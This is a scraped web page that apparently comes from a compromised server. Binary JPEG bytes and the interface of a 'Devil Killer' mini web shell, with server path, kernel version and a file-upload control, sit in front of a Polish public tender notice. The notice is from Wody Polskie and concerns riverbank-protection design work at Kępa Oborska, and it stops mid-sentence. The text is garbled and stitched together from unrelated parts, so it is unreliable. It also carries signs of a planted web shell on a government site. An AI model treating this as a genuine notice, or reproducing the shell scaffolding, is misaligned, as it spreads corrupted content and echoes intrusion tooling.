JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250711/0032254201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej wraz z uzyskaniem decyzji administracyjnych na potrzeby inwestycji pn.: „Ubezpieczenie lewego erodowanego brzegu rzeki Wisły w miejscowości Kępa Oborska” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Chałubińskiego 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-613</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">malgorzata.trojanowska@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/wody-polskie</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej wraz z uzyskaniem decyzji administracyjnych na potrzeby inwestycji pn.: „Ubezpieczenie lewego erodowanego brzegu rzeki Wisły w miejscowości Kępa Oborska” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-437a91e9-ae74-457a-bb04-bd57c9d1fdb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00322542</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00112251/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.58 Opracowanie dokumentacji projektowej - Ubezpieczenie lewego erodowanego brzegu rzeki Wisły w miejscowości Kępa Oborska</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://przetargi.wody.gov.pl/wp/auctions/r23134,Opracowanie-dokumentacji-projektowej-wraz-z-uzyskaniem-decyzji-administracyjnych.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://przetargi.wody.gov.pl/wp/auctions/r23134,Opracowanie-dokumentacji-projektowej-wraz-z-uzyskaniem-decyzji-administracyjnych.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zgodnie z art. 61 ust. 1 ustawy Pzp –<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się w formie elektronicznej, za pośrednictwem Platformy Zakupowej –<br/>zwanej dalej „Platformą” – pod adresem: https://przetargi.wody.gov.pl/. Platforma wypełnia definicję strony internetowej<br/>postępowania, na której publikowana jest dokumentacja postępowania. Wskazany w zdaniu 1 adres strony internetowej<br/>postępowania, to adres pod którym udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia<br/>bezpośrednio związane z postępowaniem o udzielenie<br/>2. Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z Platformy znajduje się pod adresem przetargi.wody.gov.pl w<br/>zakładce: Instrukcja dla Wykonawców.<br/>3. Korzystanie z Platformy nie wymaga zarejestrowania konta na Platformie.<br/>4. Dokumenty związane z postępowaniem Zamawiający zamieszcza na Platformie w zakładce z przedmiotowym postępowaniem.<br/>5. Celem skomunikowania się z Zamawiającym (z wyłączeniem złożenia oferty oraz dokumentów lub oświadczeń składanych razem<br/>z ofertą, których sposób złożenia został opisany w pkt 14.1 – 14.7 specyfikacji warunków zamówienia, zwanej dalej „SWZ”),<br/>Wykonawca korzysta z zakładki „Zapytaj”. Zakładka ta służy również Zamawiającemu do komunikacji z Wykonawcami.<br/>6. Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym złożenia oferty oraz dokumentów lub oświadczeń składanych<br/>razem z ofertą, uważa się datę wczytania korespondencji na Platformie.<br/>7. Zamawiający zaleca sporządzenie korespondencji w następujących formatach: .doc., .docx, .rtf, .pdf, .xls.<br/>8. Zamawiający informuje, że adres e-mail: malgorzata.trojanowska@wody.gov.pl wskazany w ogłoszeniu o zamówieniu, służy jedynie do<br/>przesyłania ogłoszeń i otrzymywania informacji zwrotnej z Biuletynu Zamówień Publicznych. Nie jest to adres do komunikacji z<br/>Wykonawcami.<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 MB.<br/>10. Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów lub oświadczeń składane są przez Wykonawcę<br/>za pośrednictwem Platformy jako załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych<br/>odwzorowań dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>11. Osobą uprawnioną do kontaktu z Wykonawcami jest Małgorzat Trojanowska. Kontakt odbywa się za pośrednictwem Platformy.<br/>12. Postępowanie o udzielenie zamówienia jest prowadzone w języku polskim.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Informacja dotycząca przetwarzania danych osobowych. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. <br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a)	administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody Polskie z siedzibą w Warszawie przy ul. Tytusa Chałubińskiego 8, 00-613 Warszawa, REGON: 368302575, NIP: 527-282-56-16;<br/>b)	kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem <br/>e-mail: iod@wody.gov.pl;<br/>2	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego oznaczonego numerem postępowania W.ROZ.2710.56.2025/ZZW prowadzonym na podstawie przepisów ustawy <br/>z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>a)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>b)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy <br/>z dnia 11 września 2019 r. Prawo zamówień publicznych, przez okres 4 lat licząc od końca roku kalendarzowego, w którym zakończono postępowanie o udzielenie zamówienia, <br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>c)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy z dnia <br/>11 września 2019 r. Prawo zamówień publicznych, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;<br/>d)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO<br/>e)	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania <br/>w odniesieniu do przechowywania, w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO<br/>f)	nie przysługuje Państwu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">W.ROZ.2710.56.2025/ZZW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 582475,00 </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> . Przedmiotem zamówienia jest opracowanie dokumentacji projektowej wraz z uzyskaniem decyzji administracyjnych na potrzeby inwestycji pn.: “Ubezpieczenie lewego erodowanego brzegu rzeki Wisły w miejscowości Kępa Oborska”. <br/>W ramach zamówienia podstawowego Zamawiający przewiduje:<br/> 1) opracowanie Karty Informacyjnej Przedsięwzięcia; <br/>2) sporządzenie wniosku wraz z kompletem niezbędnych załączników o wydanie decyzji o środowiskowych uwarunkowaniach dla realizacji Zadania (zwanej dalej „Decyzją środowiskową”) oraz złożenie wniosku do właściwego organu administracji publicznej; <br/>3) skuteczne uzyskanie prawomocnej Decyzji środowiskowej; <br/>4) sporządzenie wniosku wraz z kompletem niezbędnych załączników o wydanie decyzji pozwolenia wodnoprawnego dla realizacji Zadania (zwanej dalej „Decyzją wodnoprawną”) oraz złożenie wniosku do właściwego organu administracji publicznej; <br/>5) skuteczne uzyskanie prawomocnej Decyzji wodnoprawnej; <br/>6) opracowanie operatu dendrologicznego (inwentaryzacji drzew i krzewów przeznaczonych do wycinki z podziałem na: gatunki drzew, średnice, obwody, numery działek i właścicieli) oraz oznaczenie w terenie roślinności przeznaczonej do wycinki; <br/>7) sporządzenie wniosku o wydanie zezwolenia na wycinkę drzew wraz ze złożeniem go do właściwego organu administracji publicznej <br/>8) skuteczne uzyskanie prawomocnej decyzji o zezwoleniu na wycinkę drzew; <br/>9) opracowanie dokumentacji wykonawczej na wykonanie robót budowlanych na podstawie opracowanej Dokumentacji projektowej. <br/>W ramach prawa opcji Zamawiający przewiduje:<br/>1) przygotowanie Raportu Oceny Oddziaływania na Środowisko (zwanego dalej „Raportem OOŚ”) wraz z niezbędnymi załącznikami oraz złożenie Raportu OOŚ do właściwego organu administracji publicznej; <br/>2) sporządzenie wniosku wraz z niezbędnymi załącznikami o zgłoszenie zamiaru prowadzenia działań oraz złożenie wniosku do właściwego organu administracji publicznej; <br/>3) skuteczne dokonanie zgłoszenia zamiaru prowadzenia działań; <br/>4) sporządzenie wniosku wraz z niezbędnymi załącznikami o wydanie oceny wodnoprawnej (dalej „Ocena wodnoprawna”) oraz złożenie wniosku do właściwego organu administracji publicznej; <br/>5) skuteczne uzyskanie Oceny wodnoprawnej; <br/>6) sporządzenie wniosku wraz z niezbędnymi załącznikami o wydanie decyzji o warunkach prowadzenia działań oraz złożenie wniosku do właściwego organu administracji publicznej; <br/>7) skuteczne uzyskanie prawomocnej decyzji o warunkach prowadzenia działań; <br/>8) sporządzenie opinii o wartości nieruchomości planowanych do przejęcia na rzecz Skarbu Państwa (operat szacunkowy); <br/>9) opracowanie projektu budowlanego; <br/>10) sporządzenie wniosku wraz z niezbędnymi załącznikami o zgłoszenie budowy lub wykonywania innych robót budowlanych oraz złożenie wniosku do właściwego organu administracji publicznej; <br/>11) skuteczne dokonanie zgłoszenia budowy lub wykonywania innych robót budowlanych; <br/>12) sporządzenie wniosku wraz z kompletem niezbędnych załączników o wydanie decyzji o pozwoleniu na budowę oraz złożenie wniosku do właściwego organu administracji publicznej; <br/>13) skuteczne uzyskanie prawomocnej decyzji o pozwoleniu na budowę; <br/>14) zaktualizowanie Przedmiaru Robót i Kosztorysu Inwestorskiego oraz dostosowanie dokumentacji wykonawczej do podziału robót na etapy, przy założeniu nie więcej niż 2-krotnej aktualizacji; <br/>15) pełnienie nadzoru autorskiego (zwanego dalej „Nadzorem autorskim”) nad prowadzonymi robotami budowlanymi – od ich rozpoczęcia do dnia zakończenia robót i przekazania obiektu do użytkowania – 10 Nadzorów autorskich. <br/>Szczegółowe informacje dotyczące przedmiotu zamówienia, zakresu, wymagań i warunków wykonania zamówienia zawiera Załącznik Nr 1 do SWZ “Opis przedmiotu zamówienia” oraz Załącznik nr 6 do SWZ “Projektowane postanowienia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1 Realizacja prawa opcji polegać będzie na wykonaniu w całości lub też w części zakresu zamówienia przewidzianego do realizacji ujętego w opisie zamówienia objętego prawem opcji stanowiącego Załącznik nr 1 do SWZ.<br/>2 Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w ramach realizacji przedmiotu umowy. W przypadku nieskorzystania przez Zamawiającego z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <br/>3.	Zamawiający będzie mógł skorzystać z prawa opcji w całości lub w części w sytuacji, gdy będzie posiadał środki finansowe na realizację zakresu przewidzianego do wykonania w ramach prawa opcji.<br/>4.	Jeżeli Zamawiający będzie chciał skorzystać z prawa opcji w całości lub w części, o takim zamiarze poinformuje Wykonawcę odrębnym pismem/oświadczeniem, w który wskazany będzie zakres uruchamiany w ramach prawa opcji.<br/>5.	Rozpoczęcie zakresu wykonywanych w ramach opcji nastąpi najpóźniej w terminie do 14 dni roboczych od dnia przekazania informacji, o której mowa w/w zdaniu.<br/>6.	Prace realizowane w ramach prawa opcji muszą być świadczone zgodnie z wymaganiami podanymi w Opisie przedmiotu zamówienia stanowiącym Załącznik Nr 1 do SWZ.<br/>7.	Uruchomienie opcji nie będzie wymagało zmiany umowy.<br/>8.	Wykonawca jest zobowiązany do realizacji Przedmiotu Opcji w przypadku i w zakresie, w jakim korzysta z niego Zamawiający, zgodnie z treścią oświadczenia Zamawiającego o skorzystaniu z prawa opcji i warunkami określonymi w Umowie. W przypadku skorzystania przez Zamawiającego z prawa opcji uruchomiony w tym trybie Przedmiot Opcji ma być realizowany w sposób i w trybie określonym w Umowie.<br/>9.	Zakres opcjonalny zamówienia stanowi Przedmiot Umowy, przy czym konieczność jego realizacji aktualizuje się w przypadku skorzystania przez Zamawiającego z zastrzeżonego prawa opcji zgodnie z zapisami Załącznika Nr 6 – Projektowane postanowienia umowy (w zakresie, w jakim opcja jest uruchamiana).<br/>10.	W momencie złożenia oświadczenia o skorzystaniu z prawa opcji następuje zaciągnięcie przez Zamawiającego zobowiązania finansowego w wysokości wynikającej z zakresu usług objętego realizowaną na mocy danego oświadczenia opcją.<br/>11.	Wykonawcy nie przysługuje żadne roszczenie w stosunku do Zamawiającego w przypadku, gdy Zamawiający nie skorzysta z prawa opcji. Wykonawca nie jest obowiązany do realizacji zakresu opcjonalnego w zakresie, w jakim zastrzeżone prawo opcji nie zostało uruchomione przez Zamawiającego zgodnie z zapisami Umowy, jak również Wykonawca nie może domagać się realizacji Przedmiotu Opcji.<br/>Zamawiający określa maksymalną wartość opcji na kwotę 310.575,00 zł <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">27 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: 15.1. Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2. Oferty oceniane będą na podstawie następujących kryteriów:<br/>15.2.1. Cena brutto – waga 60 %<br/>15.2.2. Doświadczenie zawodowe Projektanta – waga 40 %<br/>15.3. Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pd<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie,<br/>Pc – liczba punktów w kryterium „Cena brutto”,<br/>Pd – liczba punktów w kryterium „Doświadczenie zawodowe Projektanta”.<br/>15.4. Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>15.4.1. Każda z ważnych ofert będzie punktowana w kryterium określonym w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty<br/>badanej do ceny brutto najniższej ze wszystkich ważnych ofert, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie:<br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>15.4.2. Punkty w kryterium „Doświadczenie zawodowe Projektanta” zostaną przyznane zgodnie z poniższymi zasadami:<br/>Punkty w tym kryterium będą przyznawane za doświadczenie zawodowe osoby, która będzie pełnić funkcję Projektanta przy<br/>realizacji przedmiotu zamówienia. Ocena zostanie dokonana na podstawie liczby projektów wskazanych przez Wykonawcę.<br/>Minimalne doświadczenie jakim wykazać ma się Projektant to zrealizowanie dwóch zadań w zakresie opracowania dokumentacji<br/>projektowej na potrzeby realizacji zadań w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane,<br/>oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie.<br/>W kryterium „Doświadczenie zawodowe projektanta&#34; można otrzymać 0, 20 lub 40 punktów. Ocena nastąpi według poniższych<br/>kryteriów:<br/>a) 0 pkt — otrzyma oferta w której Wykonawca wykaże zrealizowanie przez Projektanta dwóch zadań w zakresie opracowania<br/>dokumentacji projektowej na potrzeby realizacji zadań w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wraz z podaniem nazwy zadania, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są<br/>wykonywane (minimalny warunek udziału w postepowaniu).<br/>b) 20 pkt — otrzyma oferta w której Wykonawca wykaże zrealizowanie przez Projektanta trzech zadań w zakresie opracowania<br/>dokumentacji projektowej na potrzeby realizacji zadań w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w 